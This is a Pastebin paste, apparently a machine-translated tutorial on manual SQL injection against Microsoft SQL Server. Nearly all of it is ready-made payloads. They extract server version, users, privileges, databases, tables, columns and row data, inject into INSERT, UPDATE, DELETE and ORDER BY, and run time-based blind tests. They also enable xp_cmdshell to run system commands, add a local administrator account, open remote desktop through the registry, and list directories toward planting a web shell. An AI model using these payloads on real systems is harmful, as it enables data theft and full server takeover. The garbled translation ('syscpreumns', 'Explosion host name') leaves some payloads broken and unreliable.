API tools faq
paste
Advertisement
moemyintshein

Comprehensive SQL Server manual injection Tutorial

moemyintshein
Mar 14th, 2017
115
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 10.85 KB | None | 0 0
raw download clone embed print report
  1. (1) Get basic information
  2. Judgment branch does not support stack query:
  3. ;declare @d int–
  4. ;select count(*) from sysobjects–To determine whether the station library separation:
  5. and 1=(@@servername%2b’|’%2bhost_name())–Determine if XP_CMDSHELL exists:
  6. and 1=(Select count(*) FROM master..sysobjects Where xtype = ‘X’ AND name = ‘xp_cmdshell’) —
  7.  
  8. See if the xp_regread extended stored procedure exists
  9. and 1=(select count(*) FROM master..sysobjects where name= ‘xp_regread’)–
  10.  
  11. Exploded database version:
  12. and 1=@@version–
  13.  
  14. Explosion host name:
  15. and 1=host_name()–
  16.  
  17. Explosive local service name:
  18. and 1=@@servername–
  19.  
  20. Explode the current database:
  21. and 1=quotename(db_name())–
  22. and 1=db_name() %2b’|’–
  23.  
  24. (2) Get user and privilege information
  25. Explode the current database users:
  26. and 1=user–
  27. and 1=quotename(user)–Gets the current database permissions:
  28. and 1=(select IS_SRVRpreEMEMBER(‘sysadmin’))
  29. and 1=(Select IS_MEMBER(‘db_owner’))
  30. and 1=(select IS_srvrpreemember(‘public’))
  31. and 1= (Select HAS_DBACCESS(‘database’))The following commands only apply to SQL Server 2005 and above
  32. and 1= has_perms_by_name(db_name(), ‘DATABASE’, ‘ANY’)
  33. and 1= has_perms_by_name(‘master’, ‘DATABASE’, ‘ANY’)
  34.  
  35. (3) Gets the database information
  36. Number of all databases:
  37. and 1=(select quotename(count(name)) from master..sysdatabases)–
  38. and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases) —
  39. and 1=(select str(count(name))%2b’|’ from master..sysdatabases) —Number of Explosive User Databases:
  40. and 1=(select quotename(count(name)) from master..sysdatabases where dbid>5)–
  41. and 1=(select str(count(name))%2b’|’ from master..sysdatabases where dbid>5) —
  42. and 1=(select cast(count(name) as varchar)%2bchar(1) from master..sysdatabases where dbid>5) —
  43.  
  44. Explode the database one by one:
  45. and 1=quotename(db_name(N))–
  46. and 1=db_name(N)%2b’|’–
  47. and 1=(select name%2b’|’ from master..sysdatabases where dbid=5)–
  48. and 1=(select name%2bchar(1) from master..sysdatabases where dbid=5)–
  49. and 1=(select top 1 quotename(name) from master..sysdatabases where dbid not in(select top N dbid from master..sysdatabases))–
  50.  
  51. All bursts of a database (only mssql2005 and above):
  52. and 1=(select quotename(name) from master..sysdatabases FOR XML PATH(”))–
  53. and 1=(select ‘|’%2bname%2b’|’ from master..sysdatabases FOR XML PATH(”))–
  54.  
  55. FOR XML PATH can be based on the output of the query results into XML format. Such as the prompt “string or binary data will be truncated. Statement has been terminated.” Error, because the amount of data is too large, available substring function extraction times. Besides that
  56. and 1=(select name from master..sysdatabases FOR XML RAW)–
  57. and 1=(select name from master..sysdatabases FOR XML Auto)–
  58.  
  59. (4) Gets the table information in the database
  60. Blast the number of tables in the specified database:
  61. and 1=(select quotename(count(*)) from The_database_name..sysobjects where xtype=’U’) —
  62. and 1=(select cast(count(*) as varchar)%2b’|’ from The_database_name..sysobjects where xtype=’U’) —
  63. and 1=(select cast(count(*) as varchar)%2bchar(1) from The_database_name..sysobjects where xtype=0x55)–Explosion-specific designated database table:
  64. and 0<>(select top 1 quotename(name) from The_database_name..sysobjects where xtype=’U’ where Exclusion_criteria)–
  65. and 1=convert(int,(select top 1 table_name from information_schema.tables))–
  66. and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in(‘xxxx’)))–
  67.  
  68. A burst database all tables (only mssql2005 and above):
  69. and 1=(select quotename(name) from The_database_name..sysobjects where xtype=’U’ FOR XML PATH(”))–
  70. and 1=(select ‘|’%2bname%2b’|’ from The_database_name..sysobjects where xtype=’U’ FOR XML PATH(”))–
  71.  
  72. (5) Gets the information from the columns in the database table
  73. Columnar number in the explosion specification table:
  74. and 1=(select quotename(count(name)) from The_database_name..syscpreumns where id=(select id from The_database_name..sysobjects where name=’Specified table name’ ))–
  75. and 1=(select cast(count(name) as varchar)%2bchar(1) from The_database_name..syscpreumns where id=(select id from The_database_name..sysobjects where name=’Specified table name’ ))–Explicitly specify the columns of the table:
  76. and 1=(select top 1 quotename(cpre_name(object_id(‘Specified table name’),N)) from The_database_name..sysobjects)–
  77. and 1=(select quotename(name) from The_database_name..syscpreumns where id =(select id from The_database_name..sysobjects where name=’Specified table name’) and cpreid=N
  78. and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=’Specified table name’ )–
  79. and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=’Specified table name’ and column_name not in(‘Table Name’) )–
  80.  
  81. Sub-burst All columns of the specified table (mssql2005 and above only):
  82. and 1=(select quotename(name) from Table Name..syscpreumns where id =(select id from The_database_name..sysobjects where name=’Specified table name’) FOR XML PATH(”))–
  83. and 1=(select ‘|’%2bname%2b’|’ from The_database_name..syscpreumns where id =(select id from The_database_name..sysobjects where name=’Specified table name’) FOR XML PATH(”))–
  84.  
  85. (6) Retrieve data
  86. Exploding the number of records in the specified table:
  87. and 1=(select quotename(count(*)) from “Specifies the database”..”Specified table name”)–
  88. and 1=(select cast(count(*) as varchar)%2b’|’ from “Specifies the database”..”Specified table name”)–The column-by-column specification specifies the data for the column:
  89. and 1=(select top 1 quotename(“Specified column name”1)%2bquotename(“Specified column name”2) from “Specifies the database”..”Specified table name” where”Exclusion criteria”)–
  90. and 1=(select top 1 cast(“Specified column name”1 as varchar)%2b’|’%2bcast(“Specified column name”2 as varchar) from “Specifies the database”..”Specified table name” where”Exclusion criteria”)–Burst one by one all the specified table data fields ( limited to mssql2005 and above ):
  91. and 1=(select top 1 * from “Specifies the database”..”Specified table name” where”Exclusion criteria” FOR XML PATH(”))–The N data burst at once all fields ( limited to mssql2005 and above ):
  92. and 1=(select top N * from “Specifies the database”..”Specified table name” FOR XML PATH(”))–
  93.  
  94. (7) Insert、Update、Delete、Order By、Group By、Top Injection
  95. Insert
  96. insert into users values(‘vk’,convert(int,@@version))–,’123′)
  97. nsert into users values(‘vk’,’123′ + convert(int,@@version))–‘)
  98. insert into users values(‘vk’,’123′) if substring(user,1,1)=’d’ waitfor delay ‘0:0:5’ else select 2–‘)Update
  99. update users set uname=’vvvk’,upass=’11111′ where uid=1 and 1=convert(int,@@version)
  100. update users set uname=’vvvk’,upass=’11111’+convert(int,@@version)+” where uid=1
  101. update users set uname=’vvvk’,upass=’11111′ where uid=1 if substring(user,1,1)=’d’ waitfor delay ‘0:0:5’ else select 2Delete
  102. Delete from users where uid =9+convert(int,@@version)
  103. Delete from users where uid =9 and 1=convert(int,@@version)
  104. Delete from users where uid =9 if substring(user,1,1)=’d’ waitfor delay ‘0:0:5’ else select 2
  105.  
  106. Order By:
  107. select * from users order by uid,convert(int,@@version)
  108. select * from users order by uid+convert(int,@@version)
  109. select * from users order by uid if substring(user,1,1)=’d’ waitfor delay ‘0:0:5’ else select 2
  110.  
  111. Group By:
  112. select count(uid),uname from users group by uid,uname union select ‘1’,’2′
  113. select count(uid),uname from users group by uid,uname,uname+convert(int,@@version)
  114. select count(uid),uname from users group by uid,uname if substring(user,1,1)=’d’ waitfor delay ‘0:0:5’ else select 2
  115.  
  116. Top
  117. select top 1 @@version,* from users
  118. select top 0 1 from sysobjects union select @@version–,* from users
  119.  
  120. (8) Use of stored procedures
  121. Commonly used stored procedures:
  122. xp_cmdshell — use this stored procedure can directly execute system commands
  123. xp_regread —- use this stored procedure can read the registry
  124. xp_regwrite —- use this stored procedure can be written to the registry
  125. xp_dirtree —- use this storage The process can be a directory operation
  126. xp_enumdsn — use this stored procedure can be odbc connection
  127. xp_loginconfig – use this stored procedure can be configured server security mode informationCheck whether it is enabled:
  128. and 1=(Select count(*) from master..sysobjects where xtype=’X’ and name='”Stored procedure name”‘)–
  129.  
  130. (9) Use the xp_cmdshel
  131. Check if xp_cmdshell is enabled:
  132. and 1=(Select count(*) from master..sysobjects where xtype=’X’ and name=’xp_cmdshell’)–Remove xp_cmdshell:
  133. ;exec sp_dropextendedproc ‘xp_cmdshell’–Enable the xp_cmdshell (requires database support stacked queries) :
  134. ;EXEC sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’ —
  135. ;EXEC sp_configure ‘show advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE–
  136.  
  137. Use xp_cmdshell to execute system commands:
  138. ;exec master..xp_cmdshell “System command” —
  139.  
  140. (10) Permeability of different methods
  141. SA permissions:
  142. + the target server to open the remote desktop, then the direct establishment of the system account password, remote login, access to the target server permissions:
  143. ;exec master..xp_cmdshell “net user “account password” /add %26%26 net localgroup administrators “account number” /add” —
  144. + If the target server does not open the remote desktop, use the following command to open it:
  145. ;exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SYSTEM\CurrentContrpreSet\Contrpre\Terminal Server’,’fDenyTSConnections’,’REG_DWORD’,0;–DB_OWNER Permissions:The main idea is to list the directory – the backup to get the shell.
  146. 1, access WEB physical path:
  147. ;create table temp (dir nvarchar(255),depth varchar(255),files varchar(255),id int not null identity (1,1));–
  148.  
  149. Create a table, a total of four fields, the first three fields used to store the implementation of stored procedures xp_dirtree return results, ID field is convenient to query the specified content.
  150. ;insert into temp (dir,depth,files) exec master..xp_dirtree ‘”The absolute path to the directory to browse”‘,1,1–
  151.  
  152. Use xp_dirtree to insert the files and folders of the specified path into the table.
  153. and 1=(select quotename(dir) from temp where id=1)–
  154.  
  155. Through the enumeration id value of the temporary table to save a file and directory to check out.
  156. and 1=(select quotename(dir) from temp where id=1)–
  157.  
  158. A list of all the files and directories stored in the table to check out. Only mssql2005 and above.
  159. ;drop table temp;–
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!